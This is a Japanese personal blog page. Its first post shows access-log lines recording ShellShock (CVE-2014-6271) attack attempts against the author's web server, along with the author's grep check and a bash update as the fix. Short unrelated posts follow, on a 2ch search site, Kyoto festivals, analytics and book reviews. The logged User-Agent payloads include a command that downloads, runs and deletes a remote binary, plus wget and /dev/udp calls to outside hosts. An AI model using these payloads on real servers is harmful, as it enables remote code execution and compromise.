bash 脆弱性「ShellShock」の試行を示すHTTPアクセスログ

httpdのアクセスログを対象に以下のコマンドを実行してみると、結構ボロボロ出てきて怖い。
管理するサイトに来ている bash の脆弱性「ShellShock」にあたる攻撃の跡です。

ひとまず yum update bash で対処。mod_security も入れるべきかな。

grep '()' /var/log/httpd/access_log /var/log/httpd/ssl_access_log

ログの一部。
※外部URLを指定されているログは、リンクを防ぐために「http」を抜いています。

209.126.230.72 - - [25/Sep/2014:12:49:42 +0900] "GET / HTTP/1.0" 200 78 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)”
89.207.135.125 - - [25/Sep/2014:18:49:42 +0900] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 224 "-" "() { :;}; /bin/ping -c 1 198.101.206.138”
54.251.83.67 - - [28/Sep/2014:01:57:22 +0900] "GET / HTTP/1.1" 200 78 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
24.251.197.244 - - [25/Sep/2014:20:17:42 +0900] "GET / HTTP/1.1" 200 17487 "-" "() { :; }; echo -e \"Content-Type: text/plain\\n\"; echo qQQQQQq"
166.78.61.142 - - [26/Sep/2014:00:54:52 +0900] "GET / HTTP/1.1" 200 17467 "-" "() { :;}; echo shellshock-scan > /dev/udp/pwn.nixon-security.se/4444”
82.221.105.197 - - [29/Sep/2014:06:18:49 +0900] "GET / HTTP/1.1" 200 78 "-" "() { :;}; /bin/bash -c \"wget 82.221.105.197/bash-count.txt\""
93.103.21.231 - - [26/Sep/2014:08:40:00 +0900] "GET / HTTP/1.1" 200 17306 "-" "() { :;}; wget 'taxiairportpop.com/s.php?s=example.com/'"
62.210.75.170 - - [29/Sep/2014:18:23:46 +0900] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 404 224 "() { :; }; wget creditstat.ru/ZmJzZWFyY2gubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null" "() { :; }; wget creditstat.ru/ZmJzZWFyY2gubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null”
94.102.60.177 - - [26/Sep/2014:22:59:10 +0900] "GET /cgi-bin/test.cgi HTTP/1.1" 404 214 "-" "() { x;};echo;echo 123456ololo | md5sum"
83.166.234.133 - - [27/Sep/2014:11:21:09 +0900] "GET / HTTP/1.0" 200 17553 "-" "() { :;}; /bin/bash -c \"wget -q -O /dev/null ad.dipad.biz/test/example.com/\”"
70.42.149.72 - - [27/Sep/2014:11:58:11 +0900] "GET / HTTP/1.0" 200 78 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\”"
54.251.83.67 - - [28/Sep/2014:01:57:22 +0900] "GET / HTTP/1.1" 200 78 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a”
82.221.105.197 - - [29/Sep/2014:06:18:49 +0900] "GET / HTTP/1.1" 200 78 "-" "() { :;}; /bin/bash -c \"wget 82.221.105.197/bash-count.txt\""
8.37.217.197 - - [29/Sep/2014:18:42:37 +0900] "GET /search HTTP/1.1" 404 - "-" "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit"
8.37.217.199 - - [29/Sep/2014:18:42:37 +0900] "GET /search HTTP/1.1" 404 - "-" "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit"

 
 
 
この辺りを参考にして対処。

bashの脆弱性(CVE-2014-6271) #ShellShock の関連リンクをまとめてみた

2ch検索「re.Find2ch」で まちBBS と VIPサービスの主要板の検索に対応

refind2ch.org の検索対応サイトを増やしました。

2ちゃんねるについては本家くらいしか知らなかったのですが、refind2ch.org を作る過程で調べていたら類似サイトが沢山あるものですね。

  • VIPサービスの主要板
    パート速報VIP、製作速報VIP、SS速報VIP、なんでも実況板
    たぶんコレが主な掲示板だと思うのですが、一応この4つを。
    避難所とかが沢山あるみたいです。
  • まちBBS
    この掲示板は提供が sc の運営陣ということで対応するかはかなり迷いました。
    一応コピーサイトではないということで。

どちらもクロール頻度は低めですが、まぁ大丈夫でしょう。

五山の送り火

毎年、この時期(お盆)になると、京都では五山の送り火がある。

五山の送り火とは、京都の山で行われる、以下の漢字または絵を象った篝火(かがりび)のことだ。

  • 「大文字」の「
  • 「松ヶ崎妙法」の「」「
  • 「舟形万灯籠」の舟の絵
  • 「左大文字」の「
  • 「鳥居形松明」の鳥居の絵

盆に家に帰ってきた先祖の霊を、また黄泉の国へ送り届けるとされる。

2ch検索「re.Find2ch」のアクセス推移(5ヶ月目)

2014年3月に 2ch の現行スレッド検索サービス refind2ch.org を作って、だいたい5ヶ月経ちました。ここまでのアクセス状況や収益などをちょっとまとめてみようかと思います。

Google Analyticsでユーザの操作を詳しく追跡する、一歩進んだアクセス解析

ユーザーがクリックした外部リンクの URL や回数ボタンをクリックした回数ポップアップの仮想ウィンドウが表示された回数や参照元などを知りたいときがあると思います。

こういうユーザの操作は、JavaScript などでトラッキングして自身のデータベースサーバなどに記録すればと思いがちですが、Google Analytics のイベント トラッキングを使えば、これらを簡単に記録して管理できます。

Google Analytics を使うメリット

  • データ管理の仕組みを自前で用意する必要がない
  • ページを構成する要素内からなら、どこからでも使える(主にJavaScriptやFlash)
  • Google Analytics が使え、JavaScript も使える環境なら、大体使える
  • 結果は Analytics の管理画面でそのまま見れる(当然リアルタイムでも見れる)
  • 集計したデータを何らかの用途に利用したいときには、Google Analytics API が使える

【書評】リリエンタールの末裔(上田早夕里)

 
「リリエンタールの末裔」「マグネフィオ」「ナイト・ブルーの記録」「幻のクロノメーター」
以上の、上田早夕里さんの4つの作品集。

作品ごとに共通点はなく独立していて、総評を書くことは難しい。一つ一つがしっかりした世界観のもとに描かれているので、一編よみ終えるたび深く入り込んだ意識を現実に引き戻し、自分の中で咀嚼した上で、次の世界の扉を開くのには時間がかかった。

外部API利用の個人Webサービス・アプリの立ち上げと継続

いとも簡単に外部のビッグデータにアクセスできる API なんて珍しくもなくなりましたが、慣れた人には朝飯前のように作れる外部 API 利用のサービスで、できるだけ長く継続していくためにはどのようなことが必要か、考えてみました。

そういう記事は数年前に流行った気がしますが、私的なまとめとして改めて。

【書評】となり町戦争(三崎亜記)

 
三崎亜記さんの、第17回小説すばる新人賞受賞作。
何はともかく、となり町との戦争、である。レクリエーションでもオリエンテーションでもなく、人が死ぬ本物の戦争だ。

「となり町」という単語から連想されるイメージは、とても呑気で退屈、日々の生活の延長であり、そこには殺伐としたものは一切ない。表紙絵の、突き抜けるようにのどかな空を見ていたから、虚をつかれた。

はてなフォトライフで「000000000000000」というファイルが出来てしまう

はてなブログに写真を載せるために、はてなフォトライフでアップロードしていると、「000000000000000」と表示され失敗してしまう現象に遭った。

とりあえず、はてなのサポートにメールを送っておいたのだが、ちょっと検索して調べてみたところ、どうやらこの現象は Exif に関係するものではないかということらしい。

フォトライフの設定で「画像の表示順」が「撮影順」(デフォルト)になっていると、Exifに同じ年月日時分秒を撮影日時に持つ画像はフォトライフ上に複数存在できない。同じ撮影日時のファイルがアップロードされた場合、先に存在したファイルは確認すること無く上書きされる。
 
何でこんなことになっているかというと、アップロードされた画像のファイル名を撮影日時で作っているからだと思われる
 
引用元: はてなフォトライフの困った仕様

比叡山「つつじヶ丘」に行ってきた

2014年5月のことになるが、比叡山に行ってきた。

叡山電鉄の八瀬比叡山口駅で降り、ケーブルカーに乗る。
ケーブルカーでは山の中腹まで行ける。
ここから山頂までは、歩いて登っていくこともできるし、ロープウェーに乗り換えていくこともできる。

比叡山のケーブルカーの中から

PAGE TOP